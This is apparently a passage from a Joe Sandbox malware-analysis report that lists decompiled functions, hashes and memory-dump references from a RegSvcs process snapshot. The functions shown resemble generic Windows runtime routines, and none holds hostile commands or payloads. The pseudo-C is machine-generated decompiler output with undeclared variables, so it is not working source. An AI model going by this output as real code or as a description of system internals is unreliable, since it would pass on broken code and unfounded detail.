Instruction Fuzzy Hash: 7201D2B2140609BFE721AF69CD81E72FBADFF84390F044525F24446570DB75ECA0DAA0

Uniqueness

Uniqueness Score: -1.00%

Function 01084015 Relevance: .0, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E01084015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E00FD2280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E00FD2280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x10a86ac);
					E00FBF900(0x10a86d4, _t28);
					E00FCFFB0(0x10a86ac, _t28, 0x10a86ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E00FCFFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L00FD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L00FD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}

0x0108401a
0x0108401e
0x01084023
0x01084028
0x01084029
0x0108402b
0x0108402f
0x01084043
0x01084046
0x01084051
0x01084057
0x0108405f
0x01084062
0x01084067
0x0108406f
0x0108407c
0x0108407c
0x0108408c
0x0108408c
0x01084097

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34151bb80f6ad37d257a58d26314cde187ebaa4bc0f27d57b68733ad70c31631
Instruction ID: 26519521cd321b27fcc04f5a049d21b8c2a1acb31733aec4b17a57d1da1f4fc7
Opcode Fuzzy Hash: 34151bb80f6ad37d257a58d26314cde187ebaa4bc0f27d57b68733ad70c31631
Instruction Fuzzy Hash: 4A018471201A457FD351BB79CD81E13F7ADFF49751B44022AB54887A12DB38EC11DAE4

Uniqueness

Uniqueness Score: -1.00%

Function 0107138A Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E0107138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x10ad360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E00FFFA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E00FD7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E00FFB640(E00FF9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x0107138a
0x0107138a
0x01071399
0x010713a3
0x010713a8
0x010713aa
0x010713b5
0x010713bb
0x010713c3
0x010713c6
0x010713c9
0x010713d4
0x010713e6
0x010713d6
0x010713df
0x010713df
0x010713f1
0x010713f2
0x010713f4
0x010713f9
0x0107140e

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0da0af69d5faf84545f4a8a1ba2f71d072fdde94c428387a000987412c3a25f4
Instruction ID: 50299c82856e6c05d8bf474fa4046818a1f1f4969bfb114ddd53153619c8355b
Opcode Fuzzy Hash: 0da0af69d5faf84545f4a8a1ba2f71d072fdde94c428387a000987412c3a25f4
Instruction Fuzzy Hash: D6015271E0421CAFDB14EFA9D842FAEBBB8EF44710F404066B904EB391D678DA15DB94

Uniqueness

Uniqueness Score: -1.00%

Function 010714FB Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E010714FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x10ad360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E00FFFA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E00FD7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E00FFB640(E00FF9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x010714fb
0x010714fb
0x0107150a
0x01071514
0x01071519
0x0107151b
0x01071526
0x0107152c
0x01071534
0x01071537
0x0107153a
0x01071545
0x01071557
0x01071547
0x01071550
0x01071550
0x01071562
0x01071563
0x01071565
0x0107156a
0x0107157f

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc2f6f455535da47a6df888cc53f9ead55286e4cc05ed835d963dad61a27c0a4
Instruction ID: 24486d9aa43bf68837556dd984f0d4c994d6cea155fea1919a0e92bdf01f1cb4
Opcode Fuzzy Hash: cc2f6f455535da47a6df888cc53f9ead55286e4cc05ed835d963dad61a27c0a4
Instruction Fuzzy Hash: 67019271A0024CEFCB14EFA9D842EAEBBB8EF44700F444066F904EB381D678DA10CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00FB58EC Relevance: .0, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00FB58EC(intOrPtr __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x10ad360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0xf95c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E00FB5943() != 0 &&  *0x10a5320 > 5) {
					E01037B5E( &_v44, _t27);
					_t22 =  &_v28;
					E01037B5E( &_v28, _t28);
					_t11 = E01037B9C(0x10a5320, 0xf9bf15,  &_v28, _t22, 4,  &_v76);
				}
				return E00FFB640(_t11, _t17, _v8 ^ _t29, 0xf9bf15, _t27, _t28);
			}

0x00fb58fb
0x00fb58fe
0x00fb5906
0x00fb590a
0x00fb593c
0x00fb593c
0x00fb590c
0x00fb590c
0x00fb5911
0x00000000
0x00fb5913
0x00fb5913
0x00fb5913
0x00fb5911
0x00fb591d
0x01011035
0x0101103c
0x0101103f
0x01011056
0x01011056
0x00fb593b

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ead7c610f6aa8ee9c5bacbe8c376ce393cd781d2ce3992a98cf08c32e5b24bc3
Instruction ID: 1518a5fcd355aad500911a3de48fad7f08a7f507dcca6d4fdfcd337a00fdf634
Opcode Fuzzy Hash: ead7c610f6aa8ee9c5bacbe8c376ce393cd781d2ce3992a98cf08c32e5b24bc3
Instruction Fuzzy Hash: DF01D472A00904DBCB18EB66DC01BEE77BCEF81730F944069AA5597244DE35DD01DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00FCB02A Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FCB02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E00FD7D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E01037016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}

0x00fcb037
0x00fcb039
0x00fcb03b
0x00fcb040
0x0101a60e
0x00000000
0x00000000
0x0101a61d
0x00fcb04b
0x00fcb04e
0x0101a627
0x0101a634
0x00000000
0x00000000
0x0101a641
0x0101a653
0x0101a643
0x0101a64c
0x0101a64c
0x0101a65b
0x00000000
0x00000000
0x00000000
0x0101a66c
0x00fcb057
0x00fcb057
0x00fcb057
0x00fcb046
0x00fcb046
0x00000000

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction ID: 45d10ede229cf3464bf4ad17567bb93828f1b55345fb71d1161a1fbe73357afe
Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction Fuzzy Hash: 9B01BC32B45A80DFD322871CCA89F6777D8EB85750F0904A5F919CBA51D728DC40E624

Uniqueness

Uniqueness Score: -1.00%

Function 01081074 Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01081074(intOrPtr __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E0108165E(__ebx, 0x10a8ae4, (__edx -  *0x10a8b04 >> 0x14) + (__edx -  *0x10a8b04 >> 0x14), __edi, __ecx, (__edx -  *0x10a8b04 >> 0x14) + (__edx -  *0x10a8b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E0107AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E00FD7D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E0106FE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}

0x01081074
0x01081080
0x01081082
0x0108108a
0x0108108f
0x01081093
0x010810ab
0x010810ab
0x010810c3
0x010810cf
0x010810e1
0x010810d1
0x010810da
0x010810da
0x010810e9
0x010810f5
0x010810f5
0x010810fe

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 909ac5e59c1041e30a0603295b4d6a19f8448d77115444b622340d1781b91f9e
Instruction ID: ce8e3390dc79bc13acf9c5391d2cb37668662af74beb96a0632f2f4a39d0baf9
Opcode Fuzzy Hash: 909ac5e59c1041e30a0603295b4d6a19f8448d77115444b622340d1781b91f9e
Instruction Fuzzy Hash: FE0128726087429FC751EB68CC00B5A7BE5BF84310F04C919F9C583290EE74D442CB92

Uniqueness

Uniqueness Score: -1.00%

Function 01071751 Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E01071751(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				void* __edi;
				void* __esi;
				void* _t17;
				signed char* _t18;
				intOrPtr _t24;
				void* _t30;
				intOrPtr _t31;
				intOrPtr _t32;
				void* _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				signed int _t36;

				_t29 = __edx;
				_t24 = __ebx;
				_v8 =  *0x10ad360 ^ _t36;
				_t31 = __edx;
				_t34 = __ecx;
				E00FFFA60( &_v52, 0, 0x2c);
				_v20 = _t34;
				_v46 = 0x103a;
				_v16 = _t31;
				_v12 = _a4;
				_t17 = E00FD7D50();
				_t32 = _t30;
				_t35 = _t33;
				if(_t17 == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v52);
				_push(0xc);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E00FFB640(E00FF9AE0(), _t24, _v8 ^ _t36, _t29, _t32, _t35);
			}

0x01071751
0x01071751
0x01071760
0x0107176a
0x0107176f
0x01071771
0x0107177b
0x01071781
0x01071788
0x0107178b
0x0107178e
0x01071793
0x01071794
0x01071797
0x010717a9
0x01071799
0x010717a2
0x010717a2
0x010717b4
0x010717b5
0x010717b7
0x010717bc
0x010717cf

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aff769764555fda5d070cf190d1357e6789779f4f657640a5b7f7e047c09c40e
Instruction ID: fd5a7fe3f05c91e66c1d9f02d202e6bdb4687737e093938d51357b538a46222e
Opcode Fuzzy Hash: aff769764555fda5d070cf190d1357e6789779f4f657640a5b7f7e047c09c40e
Instruction Fuzzy Hash: B4017171E00218ABD710EBA9DC46EAFBBB8EF84700F444066F945EB391DA789900C794

Uniqueness

Uniqueness Score: -1.00%

Function 0106FE3F Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E0106FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x10ad360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E00FFFA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E00FD7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E00FFB640(E00FF9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x0106fe3f
0x0106fe3f
0x0106fe4e
0x0106fe58
0x0106fe5d
0x0106fe5f
0x0106fe6a
0x0106fe72
0x0106fe75
0x0106fe78
0x0106fe83
0x0106fe95
0x0106fe85
0x0106fe8e
0x0106fe8e
0x0106fea0
0x0106fea1
0x0106fea3
0x0106fea8
0x0106febd

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: adab1bf96e7027b668eb9112d0bf6e898fd487c2bb75af41b66dbc51c006bfb7
Instruction ID: bb92817e53acb79b3a384bb4c11a1a9767beaa1f885ef57df9086032f2177b32
Opcode Fuzzy Hash: adab1bf96e7027b668eb9112d0bf6e898fd487c2bb75af41b66dbc51c006bfb7
Instruction Fuzzy Hash: 78017571A0420CABD714EBA9D846FAEBBB8EF44700F004066B9009B391DA749911C794

Uniqueness

Uniqueness Score: -1.00%

Function 0106FEC0 Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E0106FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x10ad360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E00FFFA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E00FD7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E00FFB640(E00FF9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x0106fec0
0x0106fec0
0x0106fecf
0x0106fed9
0x0106fede
0x0106fee0
0x0106feeb
0x0106fef3
0x0106fef6
0x0106fef9
0x0106ff04
0x0106ff16
0x0106ff06
0x0106ff0f
0x0106ff0f
0x0106ff21
0x0106ff22
0x0106ff24
0x0106ff29
0x0106ff3e

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73fc31927343171b8432f7db2341181fe3113404133d8bea12b0fbd8b22d73c7
Instruction ID: 338ed33130c469bfecd76ba3132f93490381663c4e549af332b0a85a83a7d9d4
Opcode Fuzzy Hash: 73fc31927343171b8432f7db2341181fe3113404133d8bea12b0fbd8b22d73c7
Instruction Fuzzy Hash: BD018871A0020CABD714EBA9D846FBFB7B8EF45700F404066BA00DB391DA74D911C794

Uniqueness

Uniqueness Score: -1.00%

Function 01088A62 Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E01088A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x10ad360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E00FD7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E00FFB640(E00FF9AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x01088a62
0x01088a71
0x01088a79
0x01088a82
0x01088a85
0x01088a89
0x01088a8c
0x01088a8f
0x01088a92
0x01088a95
0x01088a9f
0x01088ab1
0x01088aa1
0x01088aaa
0x01088aaa
0x01088abc
0x01088abd
0x01088abf
0x01088ac4
0x01088ada

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4a18569f16d24683fad31adfa6e01de88231d374f82e5f88c91f3ae1f779f32
Instruction ID: c945f5ff8a02903438d1a57756cdd7e0118e78544b4516d1f0c228101c29519b
Opcode Fuzzy Hash: e4a18569f16d24683fad31adfa6e01de88231d374f82e5f88c91f3ae1f779f32
Instruction Fuzzy Hash: 2D012171A0421CAFDB00EFA9D9419AEB7B8EF48310F50405AFA04E7351D634A900CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01088ED6 Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E01088ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x10ad360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E00FD7D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E00FFB640(E00FF9AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}

0x01088ed6
0x01088ee5
0x01088eed
0x01088ef0
0x01088efa
0x01088f03
0x01088f0c
0x01088f15
0x01088f24
0x01088f27
0x01088f31
0x01088f43
0x01088f33
0x01088f3c
0x01088f3c
0x01088f4e
0x01088f4f
0x01088f51
0x01088f56
0x01088f69

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70d82928cb1dcea4d86e9c9f429d51d9c240d69f75991e364150ef8fd9f93052
Instruction ID: edec66bc57d6ecace18dabe3380399430a2b8b64932f2121261fd19f3132fea4
Opcode Fuzzy Hash: 70d82928cb1dcea4d86e9c9f429d51d9c240d69f75991e364150ef8fd9f93052
Instruction Fuzzy Hash: 471112709042099FD704EFA9D441BAEB7F4FF08300F4442A6E558EB742E6389940CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00FBDB60 Relevance: .0, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FBDB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E00FBDB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E00FBE7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L00FBE8B0(__ecx, _t14, 0xfff);
							L00FD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}

0x00fbdb64
0x00fbdb66
0x00fbdb6b
0x00fbdbaa
0x00fbdb71
0x00fbdb76
0x00fbdb7a
0x00fbdba3
0x00fbdb7c
0x00fbdb87
0x00fbdb8b
0x01014fa1
0x01014fb3
0x01014fb8
0x00fbdb91
0x00fbdb96
0x00fbdb98
0x00fbdb98
0x00fbdb8b
0x00fbdb7a
0x00fbdb9d
0x00fbdba2

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction ID: ddc87bfec11d449c12c8e6edc9eeb485efdac95c0d76a72ec49078fe1c7f48e7
Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction Fuzzy Hash: 78F0C8336016229BD7326A5788C0BD7B6958FC1B60F274035B1059B344DF688C02BED6

Uniqueness

Uniqueness Score: -1.00%

Function 00FBB1E1 Relevance: .0, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FBB1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E00FD7D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E00FD7D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
